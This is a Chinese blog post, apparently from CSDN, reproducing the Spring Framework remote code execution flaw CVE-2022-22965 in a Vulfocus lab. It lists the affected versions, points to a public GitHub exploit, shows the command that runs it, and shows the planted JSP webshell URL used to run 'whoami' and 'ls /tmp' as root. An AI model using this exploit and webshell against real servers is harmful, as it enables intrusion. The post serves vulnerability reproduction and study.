Spring Framework远程代码执行漏洞_CVE-2022-22965复现

本文介绍了Spring Framework的一个远程代码执行漏洞,该漏洞影响JDK9及以上版本的特定Spring Core和Spring Boot版本。攻击者可以利用此漏洞在受影响的系统上执行恶意代码。复现步骤包括使用Vulfocus靶场、下载开源EXP文件并进行测试,最终获取shell权限并找到flag。建议受影响的用户尽快升级到安全版本。
摘要由CSDN通过智能技术生成

1. 漏洞介绍

Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。

2、受影响版本

  • Spring Core <= 5.2.19, <= 5.3.17
  • Spring Boot <= 2.6.5

3、利用前提

  • JDK 9 及以上版本
  • Spring框架的5.3.0至5.3.17、5.2.0至5.2.19版本,以及旧版本
  • Tomcat服务器

4.漏洞复现

1.打开vulfocus靶场环境,输入访问地址进入之后为以下 ok

2,接下来下载github上的开源exp文件

https://github.com/craig/SpringCore0day

3.下载好之后在下载好的文件内打开终端 输入以上访问地址来检测

python3 exp.py --url http://123.58.236.76:43269/

4.检测发现漏洞存在并附上url地址访问

漏洞存在,shell地址为:http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=whoami

5.访问已经是root权限,flag在tmp文件下

6.直接输入文件下tmp位置即可得到flag

http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=ls%20/tmp

即可通关

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值